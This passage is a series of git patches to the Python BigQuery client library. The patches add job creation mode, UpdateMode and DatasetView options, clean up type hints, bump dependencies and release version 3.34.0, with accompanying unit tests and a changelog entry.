self.default_query_job_config = default_query_job_config @@ -286,6 +292,15 @@ def location(self): """Default location for jobs / datasets / tables.""" return self._location + @property + def default_job_creation_mode(self): + """Default job creation mode used for query execution.""" + return self._default_job_creation_mode + + @default_job_creation_mode.setter + def default_job_creation_mode(self, value: Optional[str]): + self._default_job_creation_mode = value + @property def default_query_job_config(self) -> Optional[QueryJobConfig]: """Default ``QueryJobConfig`` or ``None``. @@ -3532,13 +3547,6 @@ def query_and_wait( ) -> RowIterator: """Run the query, wait for it to finish, and return the results. - While ``jobCreationMode=JOB_CREATION_OPTIONAL`` is in preview in the - ``jobs.query`` REST API, use the default ``jobCreationMode`` unless - the environment variable ``QUERY_PREVIEW_ENABLED=true``. After - ``jobCreationMode`` is GA, this method will always use - ``jobCreationMode=JOB_CREATION_OPTIONAL``. See: - https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query - Args: query (str): SQL query to be executed. Defaults to the standard SQL diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 203ea3c7b..4cb7a056d 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -407,3 +407,22 @@ class BigLakeTableFormat(object): ICEBERG = "ICEBERG" """Apache Iceberg format.""" + + +class JobCreationMode(object): + """Documented values for Job Creation Mode.""" + + JOB_CREATION_MODE_UNSPECIFIED = "JOB_CREATION_MODE_UNSPECIFIED" + """Job creation mode is unspecified.""" + + JOB_CREATION_REQUIRED = "JOB_CREATION_REQUIRED" + """Job creation is always required.""" + + JOB_CREATION_OPTIONAL = "JOB_CREATION_OPTIONAL" + """Job creation is optional. + + Returning immediate results is prioritized. + BigQuery will automatically determine if a Job needs to be created. 
+ The conditions under which BigQuery can decide to not create a Job are + subject to change. + """ diff --git a/samples/client_query_shortmode.py b/samples/client_query_job_optional.py similarity index 69% rename from samples/client_query_shortmode.py rename to samples/client_query_job_optional.py index 50446dc48..6321aea35 100644 --- a/samples/client_query_shortmode.py +++ b/samples/client_query_job_optional.py @@ -13,16 +13,18 @@ # limitations under the License. -def client_query_shortmode() -> None: - # [START bigquery_query_shortquery] - # This example demonstrates issuing a query that may be run in short query mode. - # - # To enable the short query mode preview feature, the QUERY_PREVIEW_ENABLED - # environmental variable should be set to `TRUE`. +def client_query_job_optional() -> None: + # [START bigquery_query_job_optional] + # This example demonstrates executing a query without requiring an associated + # job. from google.cloud import bigquery + from google.cloud.bigquery.enums import JobCreationMode - # Construct a BigQuery client object. - client = bigquery.Client() + # Construct a BigQuery client object, specifying that the library should + # avoid creating jobs when possible. + client = bigquery.Client( + default_job_creation_mode=JobCreationMode.JOB_CREATION_OPTIONAL + ) query = """ SELECT @@ -44,10 +46,12 @@ def client_query_shortmode() -> None: if rows.job_id is not None: print("Query was run with job state. Job ID: {}".format(rows.job_id)) else: - print("Query was run in short mode. Query ID: {}".format(rows.query_id)) + print( + "Query was run without creating a job. Query ID: {}".format(rows.query_id) + ) print("The query data:") for row in rows: # Row values can be accessed by field name or index. 
print("name={}, gender={}, total={}".format(row[0], row[1], row["total"])) - # [END bigquery_query_shortquery] + # [END bigquery_query_job_optional] diff --git a/samples/tests/test_client_query_shortmode.py b/samples/tests/test_client_query_job_optional.py similarity index 85% rename from samples/tests/test_client_query_shortmode.py rename to samples/tests/test_client_query_job_optional.py index 41132f24c..0e0b2cf19 100644 --- a/samples/tests/test_client_query_shortmode.py +++ b/samples/tests/test_client_query_job_optional.py @@ -1,4 +1,4 @@ -# Copyright 2024 Google LLC +# Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -14,13 +14,13 @@ import typing -from .. import client_query_shortmode +from .. import client_query_job_optional if typing.TYPE_CHECKING: import pytest def test_client_query_shortmode(capsys: "pytest.CaptureFixture[str]") -> None: - client_query_shortmode.client_query_shortmode() + client_query_job_optional.client_query_job_optional() out, err = capsys.readouterr() assert "Query was run" in out diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 4fa093c69..417f911b8 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -554,13 +554,9 @@ def test_query_and_wait_retries_job_times_out(): ) -def test_query_and_wait_sets_job_creation_mode(monkeypatch: pytest.MonkeyPatch): - monkeypatch.setenv( - "QUERY_PREVIEW_ENABLED", - # The comparison should be case insensitive. 
- "TrUe", - ) +def test_query_and_wait_sets_job_creation_mode(): client = mock.create_autospec(Client) + client.default_job_creation_mode = "JOB_CREATION_OPTIONAL" client._call_api.return_value = { "jobReference": { "projectId": "response-project", @@ -642,6 +638,7 @@ def test_query_and_wait_sets_location(): "useInt64Timestamp": True, }, "requestId": mock.ANY, + "jobCreationMode": mock.ANY, }, timeout=None, ) @@ -658,6 +655,7 @@ def test_query_and_wait_sets_location(): ) def test_query_and_wait_sets_max_results(max_results, page_size, expected): client = mock.create_autospec(Client) + client.default_job_creation_mode = None client._call_api.return_value = { "jobReference": { "projectId": "response-project", @@ -703,6 +701,7 @@ def test_query_and_wait_sets_max_results(max_results, page_size, expected): def test_query_and_wait_caches_completed_query_results_one_page(): client = mock.create_autospec(Client) + client.default_job_creation_mode = None client._call_api.return_value = { "jobReference": { "projectId": "response-project", @@ -768,6 +767,7 @@ def test_query_and_wait_caches_completed_query_results_one_page(): def test_query_and_wait_caches_completed_query_results_one_page_no_rows(): client = mock.create_autospec(Client) + client.default_job_creation_mode = None client._call_api.return_value = { "jobReference": { "projectId": "response-project", diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 468068321..8ce8d2cbd 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -213,6 +213,17 @@ def test_ctor_w_client_options_universe(self): ) self.assertEqual(client._connection.API_BASE_URL, "https://bigquery.foo.com") + def test_ctor_w_job_creation_mode(self): + creds = _make_credentials() + http = object() + client = self._make_one( + project=self.PROJECT, + credentials=creds, + _http=http, + default_job_creation_mode="foo", + ) + self.assertEqual(client.default_job_creation_mode, "foo") + def test_ctor_w_location(self): from 
google.cloud.bigquery._http import Connection From cfbf263947e4acb3a866dae96e622c67fc0c6ec3 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 27 May 2025 20:46:02 +0200 Subject: [PATCH 120/202] chore(deps): update dependency pytest-xdist to v3.7.0 (#2203) Co-authored-by: Chalmer Lowe Co-authored-by: Lingqing Gan --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/magics/requirements-test.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/snippets/requirements-test.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index cc71ee426..2ad35b418 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 7b01ce8ac..3ca365401 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index cc71ee426..2ad35b418 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index cc71ee426..2ad35b418 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt 
index 503324cb0..767f71fb1 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -2,4 +2,4 @@ google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 -pytest-xdist==3.6.1 +pytest-xdist==3.7.0 From d92b487c29e8d27a2f04e3b15eec14e8c3d109f0 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Tue, 27 May 2025 13:34:28 -0700 Subject: [PATCH 121/202] chore(main): release 3.34.0 (#2193) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> Co-authored-by: shollyman --- CHANGELOG.md | 18 ++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 19 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 2f7166d44..3b29a6a41 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,24 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.34.0](https://github.com/googleapis/python-bigquery/compare/v3.33.0...v3.34.0) (2025-05-27) + + +### Features + +* Job creation mode GA ([#2190](https://github.com/googleapis/python-bigquery/issues/2190)) ([64cd39f](https://github.com/googleapis/python-bigquery/commit/64cd39fb395c4a03ef6d2ec8261e1709477b2186)) + + +### Bug Fixes + +* **deps:** Update all dependencies ([#2184](https://github.com/googleapis/python-bigquery/issues/2184)) ([12490f2](https://github.com/googleapis/python-bigquery/commit/12490f2f03681516465fc34217dcdf57000f6fdd)) + + +### Documentation + +* Update query.py ([#2192](https://github.com/googleapis/python-bigquery/issues/2192)) ([9b5ee78](https://github.com/googleapis/python-bigquery/commit/9b5ee78f046d9ca3f758eeca6244b8485fe35875)) +* Use query_and_wait in the array parameters sample ([#2202](https://github.com/googleapis/python-bigquery/issues/2202)) ([28a9994](https://github.com/googleapis/python-bigquery/commit/28a9994792ec90a6a4d16835faf2137c09c0fb02)) + ## 
[3.33.0](https://github.com/googleapis/python-bigquery/compare/v3.32.0...v3.33.0) (2025-05-19) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 8304ac025..9e1393854 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.33.0" +__version__ = "3.34.0" From de33204bd67bc897c3a19b709becd0b9473bd907 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 30 May 2025 11:16:38 +0200 Subject: [PATCH 122/202] chore(deps): update all dependencies (#2205) --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 4 ++-- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements.txt | 4 ++-- samples/snippets/requirements.txt | 2 +- 5 files changed, 8 insertions(+), 8 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 4a5b75346..a512dbd3a 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.33.0 +google-cloud-bigquery==3.34.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 7a0946fae..049e88237 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -12,8 +12,8 @@ geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 google-auth==2.40.2 -google-cloud-bigquery==3.33.0 -google-cloud-bigquery-storage==2.31.0 +google-cloud-bigquery==3.34.0 +google-cloud-bigquery-storage==2.32.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 7d0c91e3d..960eb6db4 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.10.0 db-dtypes==1.4.3 
-google.cloud.bigquery==3.33.0 -google-cloud-bigquery-storage==2.31.0 +google.cloud.bigquery==3.34.0 +google-cloud-bigquery-storage==2.32.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 9f131e5b8..27eb7459a 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,7 +1,7 @@ bigquery-magics==0.10.0 db-dtypes==1.4.3 -google-cloud-bigquery==3.33.0 -google-cloud-bigquery-storage==2.31.0 +google-cloud-bigquery==3.34.0 +google-cloud-bigquery-storage==2.32.0 ipython===8.18.1; python_version == '3.9' ipython==9.2.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index dae43eff3..fd8bd672b 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.33.0 +google-cloud-bigquery==3.34.0 From b86329188ba35e61871db82ae1d95d2a576eed1b Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 30 May 2025 12:36:07 -0400 Subject: [PATCH 123/202] Fix: Update type hints for various BigQuery files (#2206) * Fix: Update type hints for various BigQuery files This commit addresses Issue #2132 by updating type hints in the following files: - google/cloud/bigquery/external_config.py - google/cloud/bigquery/job/base.py - google/cloud/bigquery/routine/routine.py - google/cloud/bigquery/schema.py - google/cloud/bigquery/table.py These changes improve code clarity and maintainability by providing more accurate type information. 
* updates type hints across the board --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/external_config.py | 9 +++++---- google/cloud/bigquery/job/base.py | 4 +--- google/cloud/bigquery/routine/routine.py | 12 +++--------- google/cloud/bigquery/schema.py | 6 ++---- google/cloud/bigquery/table.py | 11 ++++++----- 5 files changed, 17 insertions(+), 25 deletions(-) diff --git a/google/cloud/bigquery/external_config.py b/google/cloud/bigquery/external_config.py index 6e943adf3..cb8141cd0 100644 --- a/google/cloud/bigquery/external_config.py +++ b/google/cloud/bigquery/external_config.py @@ -22,6 +22,7 @@ import base64 import copy +import typing from typing import Any, Dict, FrozenSet, Iterable, Optional, Union from google.cloud.bigquery._helpers import _to_bytes @@ -835,10 +836,10 @@ def schema(self): See https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ExternalDataConfiguration.FIELDS.schema """ - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - prop = self._properties.get("schema", {}) # type: ignore - return [SchemaField.from_api_repr(field) for field in prop.get("fields", [])] # type: ignore + prop: Dict[str, Any] = typing.cast( + Dict[str, Any], self._properties.get("schema", {}) + ) + return [SchemaField.from_api_repr(field) for field in prop.get("fields", [])] @schema.setter def schema(self, value): diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index 5eb700ce7..f007b9341 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -435,9 +435,7 @@ def __init__(self, job_id, client): @property def configuration(self) -> _JobConfig: """Job-type specific configurtion.""" - # TODO: The typehinting for this needs work. 
Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - configuration = self._CONFIG_CLASS() # pytype: disable=not-callable + configuration: _JobConfig = self._CONFIG_CLASS() # pytype: disable=not-callable configuration._properties = self._properties.setdefault("configuration", {}) return configuration diff --git a/google/cloud/bigquery/routine/routine.py b/google/cloud/bigquery/routine/routine.py index 7e079781d..e933fa137 100644 --- a/google/cloud/bigquery/routine/routine.py +++ b/google/cloud/bigquery/routine/routine.py @@ -518,23 +518,17 @@ def __init__(self): @property def project(self): """str: ID of the project containing the routine.""" - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - return self._properties["projectId"] # pytype: disable=typed-dict-error + return self._properties.get("projectId", "") @property def dataset_id(self): """str: ID of dataset containing the routine.""" - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 - return self._properties["datasetId"] # pytype: disable=typed-dict-error + return self._properties.get("datasetId", "") @property def routine_id(self): """str: The routine ID.""" - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. 
See Issue: #2132 - return self._properties["routineId"] # pytype: disable=typed-dict-error + return self._properties.get("routineId", "") @property def path(self): diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 1f1aab7a4..456730b00 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -232,11 +232,9 @@ def __init__( if max_length is not _DEFAULT_VALUE: self._properties["maxLength"] = max_length if policy_tags is not _DEFAULT_VALUE: - # TODO: The typehinting for this needs work. Setting this pragma to temporarily - # manage a pytype issue that came up in another PR. See Issue: #2132 self._properties["policyTags"] = ( - policy_tags.to_api_repr() # pytype: disable=attribute-error - if policy_tags is not None + policy_tags.to_api_repr() + if isinstance(policy_tags, PolicyTagList) else None ) if isinstance(range_element_type, str): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 3b1334bd3..3ffd5ca56 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -137,9 +137,9 @@ def _reference_getter(table): return TableReference(dataset_ref, table.table_id) -# TODO: The typehinting for this needs work. Setting this pragma to temporarily -# manage a pytype issue that came up in another PR. See Issue: #2132 -def _view_use_legacy_sql_getter(table): +def _view_use_legacy_sql_getter( + table: Union["Table", "TableListItem"] +) -> Optional[bool]: """bool: Specifies whether to execute the view with Legacy or Standard SQL. This boolean specifies whether to execute the view with Legacy SQL @@ -151,15 +151,16 @@ def _view_use_legacy_sql_getter(table): ValueError: For invalid value types. """ - view = table._properties.get("view") # type: ignore + view: Optional[Dict[str, Any]] = table._properties.get("view") if view is not None: # The server-side default for useLegacySql is True. 
- return view.get("useLegacySql", True) # type: ignore + return view.get("useLegacySql", True) if view is not None else True # In some cases, such as in a table list no view object is present, but the # resource still represents a view. Use the type as a fallback. if table.table_type == "VIEW": # The server-side default for useLegacySql is True. return True + return None # explicit return statement to appease mypy class _TableBase: From eb9c2aff242c5107f968bbd8b6a9d30cecc877f6 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 30 May 2025 17:58:02 -0400 Subject: [PATCH 124/202] feat: Add UpdateMode to update_dataset (#2204) * feat: Add UpdateMode to update_dataset This commit introduces the `UpdateMode` enum and integrates it into the `update_dataset` method in the BigQuery client. The `UpdateMode` enum allows you to specify which parts of a dataset should be updated (metadata, ACL, or full update). The following changes were made: - Defined the `UpdateMode` enum in `google/cloud/bigquery/enums.py` with values: `UPDATE_MODE_UNSPECIFIED`, `UPDATE_METADATA`, `UPDATE_ACL`, and `UPDATE_FULL`. - Modified the `update_dataset` method in `google/cloud/bigquery/client.py` to accept an optional `update_mode` parameter. This parameter is added to the query parameters if provided. - Added unit tests in `tests/unit/test_client.py` to verify the correct handling of the `update_mode` parameter, including testing all enum values and the default case where it's not provided. 
* updates enums, client, and tests --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/client.py | 22 ++++++++ google/cloud/bigquery/enums.py | 18 +++++++ tests/unit/test_client.py | 93 ++++++++++++++++++++++++++++++++- 3 files changed, 132 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index c6873545b..cc3b3eb2a 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -91,6 +91,7 @@ from google.cloud.bigquery.dataset import DatasetListItem from google.cloud.bigquery.dataset import DatasetReference from google.cloud.bigquery.enums import AutoRowIDs +from google.cloud.bigquery.enums import UpdateMode from google.cloud.bigquery.format_options import ParquetOptions from google.cloud.bigquery.job import ( CopyJob, @@ -1198,6 +1199,7 @@ def update_dataset( fields: Sequence[str], retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, + update_mode: Optional[UpdateMode] = None, ) -> Dataset: """Change some fields of a dataset. @@ -1237,6 +1239,20 @@ def update_dataset( timeout (Optional[float]): The number of seconds to wait for the underlying HTTP transport before using ``retry``. + update_mode (Optional[google.cloud.bigquery.enums.UpdateMode]): + Specifies the kind of information to update in a dataset. + By default, dataset metadata (e.g. friendlyName, description, + labels, etc) and ACL information are updated. This argument can + take on the following possible enum values. + + * :attr:`~google.cloud.bigquery.enums.UPDATE_MODE_UNSPECIFIED`: + The default value. Behavior defaults to UPDATE_FULL. + * :attr:`~google.cloud.bigquery.enums.UpdateMode.UPDATE_METADATA`: + Includes metadata information for the dataset, such as friendlyName, description, labels, etc. 
+ * :attr:`~google.cloud.bigquery.enums.UpdateMode.UPDATE_ACL`: + Includes ACL information for the dataset, which defines dataset access for one or more entities. + * :attr:`~google.cloud.bigquery.enums.UpdateMode.UPDATE_FULL`: + Includes both dataset metadata and ACL information. Returns: google.cloud.bigquery.dataset.Dataset: @@ -1250,6 +1266,11 @@ def update_dataset( path = dataset.path span_attributes = {"path": path, "fields": fields} + if update_mode: + query_params = {"updateMode": update_mode.value} + else: + query_params = {} + api_response = self._call_api( retry, span_name="BigQuery.updateDataset", @@ -1259,6 +1280,7 @@ def update_dataset( data=partial, headers=headers, timeout=timeout, + query_params=query_params, ) return Dataset.from_api_repr(api_response) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 4cb7a056d..e9cd911d0 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -409,6 +409,24 @@ class BigLakeTableFormat(object): """Apache Iceberg format.""" +class UpdateMode(enum.Enum): + """Specifies the kind of information to update in a dataset.""" + + UPDATE_MODE_UNSPECIFIED = "UPDATE_MODE_UNSPECIFIED" + """The default value. 
Behavior defaults to UPDATE_FULL.""" + + UPDATE_METADATA = "UPDATE_METADATA" + """Includes metadata information for the dataset, such as friendlyName, + description, labels, etc.""" + + UPDATE_ACL = "UPDATE_ACL" + """Includes ACL information for the dataset, which defines dataset access + for one or more entities.""" + + UPDATE_FULL = "UPDATE_FULL" + """Includes both dataset metadata and ACL information.""" + + class JobCreationMode(object): """Documented values for Job Creation Mode.""" diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 8ce8d2cbd..ed092bcdb 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -60,7 +60,8 @@ from google.cloud.bigquery import job as bqjob import google.cloud.bigquery._job_helpers -from google.cloud.bigquery.dataset import DatasetReference +from google.cloud.bigquery.dataset import DatasetReference, Dataset +from google.cloud.bigquery.enums import UpdateMode from google.cloud.bigquery import exceptions from google.cloud.bigquery import ParquetOptions import google.cloud.bigquery.retry @@ -2101,6 +2102,7 @@ def test_update_dataset(self): }, path="/" + PATH, timeout=7.5, + query_params={}, ) self.assertEqual(ds2.description, ds.description) self.assertEqual(ds2.friendly_name, ds.friendly_name) @@ -2114,6 +2116,94 @@ def test_update_dataset(self): client.update_dataset(ds, []) req = conn.api_request.call_args self.assertEqual(req[1]["headers"]["If-Match"], "etag") + self.assertEqual(req[1].get("query_params"), {}) + + def test_update_dataset_w_update_mode(self): + PATH = f"projects/{self.PROJECT}/datasets/{self.DS_ID}" + creds = _make_credentials() + client = self._make_one(project=self.PROJECT, credentials=creds) + + DESCRIPTION = "DESCRIPTION" + RESOURCE = { + "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, + "etag": "etag", + "description": DESCRIPTION, + } + dataset_ref = DatasetReference(self.PROJECT, self.DS_ID) + orig_dataset = Dataset(dataset_ref) + 
orig_dataset.description = DESCRIPTION + filter_fields = ["description"] + + test_cases = [ + (None, None), + (UpdateMode.UPDATE_MODE_UNSPECIFIED, "UPDATE_MODE_UNSPECIFIED"), + (UpdateMode.UPDATE_METADATA, "UPDATE_METADATA"), + (UpdateMode.UPDATE_ACL, "UPDATE_ACL"), + (UpdateMode.UPDATE_FULL, "UPDATE_FULL"), + ] + + for update_mode_arg, expected_param_value in test_cases: + with self.subTest( + update_mode_arg=update_mode_arg, + expected_param_value=expected_param_value, + ): + conn = client._connection = make_connection(RESOURCE, RESOURCE) + + new_dataset = client.update_dataset( + orig_dataset, + fields=filter_fields, + update_mode=update_mode_arg, + ) + self.assertEqual(orig_dataset.description, new_dataset.description) + + if expected_param_value: + expected_query_params = {"updateMode": expected_param_value} + else: + expected_query_params = {} + + conn.api_request.assert_called_once_with( + method="PATCH", + path="/" + PATH, + data={"description": DESCRIPTION}, + timeout=DEFAULT_TIMEOUT, + query_params=expected_query_params if expected_query_params else {}, + ) + + def test_update_dataset_w_invalid_update_mode(self): + creds = _make_credentials() + client = self._make_one(project=self.PROJECT, credentials=creds) + + DESCRIPTION = "DESCRIPTION" + resource = { + "datasetReference": {"projectId": self.PROJECT, "datasetId": self.DS_ID}, + "etag": "etag", + } + + dataset_ref = DatasetReference(self.PROJECT, self.DS_ID) + orig_dataset = Dataset(dataset_ref) + orig_dataset.description = DESCRIPTION + filter_fields = ["description"] # A non-empty list of fields is required + + # Mock the connection to prevent actual API calls + # and to provide a minimal valid response if the call were to proceed. 
+ conn = client._connection = make_connection(resource) + + test_cases = [ + "INVALID_STRING", + 123, + 123.45, + object(), + ] + + for invalid_update_mode in test_cases: + with self.subTest(invalid_update_mode=invalid_update_mode): + conn.api_request.reset_mock() # Reset mock for each sub-test + with self.assertRaises(AttributeError): + client.update_dataset( + orig_dataset, + fields=filter_fields, + update_mode=invalid_update_mode, + ) def test_update_dataset_w_custom_property(self): # The library should handle sending properties to the API that are not @@ -2145,6 +2235,7 @@ def test_update_dataset_w_custom_property(self): data={"newAlphaProperty": "unreleased property"}, path=path, timeout=DEFAULT_TIMEOUT, + query_params={}, ) self.assertEqual(dataset.dataset_id, self.DS_ID) From 28a5750d455f0381548df6f9b1f7661823837d81 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 2 Jun 2025 05:42:08 -0400 Subject: [PATCH 125/202] feat: Adds dataset_view parameter to get_dataset method (#2198) * feat: Add dataset_view parameter to get_dataset method This commit introduces a new `dataset_view` parameter to the `get_dataset` method in the BigQuery client. This allows you to specify the level of detail (METADATA, ACL, FULL) returned when fetching a dataset. The `DatasetView` enum has been added to `enums.py`. Unit tests have been added to verify: - Correct query parameter (`view`) formation for each enum value. - Correct behavior when `dataset_view` is None. - AttributeError is raised for invalid `dataset_view` types. * test edits, linting, etc. 
* Fixes docstring * updates docstrings * update parameter name to align with discovery doc * Update google/cloud/bigquery/client.py --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- google/cloud/bigquery/client.py | 26 +++++++++++- google/cloud/bigquery/enums.py | 18 ++++++++ tests/unit/test_client.py | 70 ++++++++++++++++++++++++++++++- tests/unit/test_create_dataset.py | 7 +++- 4 files changed, 116 insertions(+), 5 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index cc3b3eb2a..bb4d80c73 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -90,8 +90,8 @@ from google.cloud.bigquery.dataset import Dataset from google.cloud.bigquery.dataset import DatasetListItem from google.cloud.bigquery.dataset import DatasetReference -from google.cloud.bigquery.enums import AutoRowIDs -from google.cloud.bigquery.enums import UpdateMode + +from google.cloud.bigquery.enums import AutoRowIDs, DatasetView, UpdateMode from google.cloud.bigquery.format_options import ParquetOptions from google.cloud.bigquery.job import ( CopyJob, @@ -865,6 +865,7 @@ def get_dataset( dataset_ref: Union[DatasetReference, str], retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, + dataset_view: Optional[DatasetView] = None, ) -> Dataset: """Fetch the dataset referenced by ``dataset_ref`` @@ -882,7 +883,21 @@ def get_dataset( timeout (Optional[float]): The number of seconds to wait for the underlying HTTP transport before using ``retry``. + dataset_view (Optional[google.cloud.bigquery.enums.DatasetView]): + Specifies the view that determines which dataset information is + returned. By default, dataset metadata (e.g. friendlyName, description, + labels, etc) and ACL information are returned. This argument can + take on the following possible enum values. 
+ * :attr:`~google.cloud.bigquery.enums.DatasetView.ACL`: + Includes dataset metadata and the ACL. + * :attr:`~google.cloud.bigquery.enums.DatasetView.FULL`: + Includes all dataset metadata, including the ACL and table metadata. + This view is not supported by the `datasets.list` API method. + * :attr:`~google.cloud.bigquery.enums.DatasetView.METADATA`: + Includes basic dataset metadata, but not the ACL. + * :attr:`~google.cloud.bigquery.enums.DatasetView.DATASET_VIEW_UNSPECIFIED`: + The server will decide which view to use. Currently defaults to FULL. Returns: google.cloud.bigquery.dataset.Dataset: A ``Dataset`` instance. @@ -892,6 +907,12 @@ def get_dataset( dataset_ref, default_project=self.project ) path = dataset_ref.path + + if dataset_view: + query_params = {"datasetView": dataset_view.value} + else: + query_params = {} + span_attributes = {"path": path} api_response = self._call_api( retry, @@ -900,6 +921,7 @@ def get_dataset( method="GET", path=path, timeout=timeout, + query_params=query_params, ) return Dataset.from_api_repr(api_response) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index e9cd911d0..9a1e4880c 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -80,6 +80,24 @@ class CreateDisposition(object): returned in the job result.""" +class DatasetView(enum.Enum): + """DatasetView specifies which dataset information is returned.""" + + DATASET_VIEW_UNSPECIFIED = 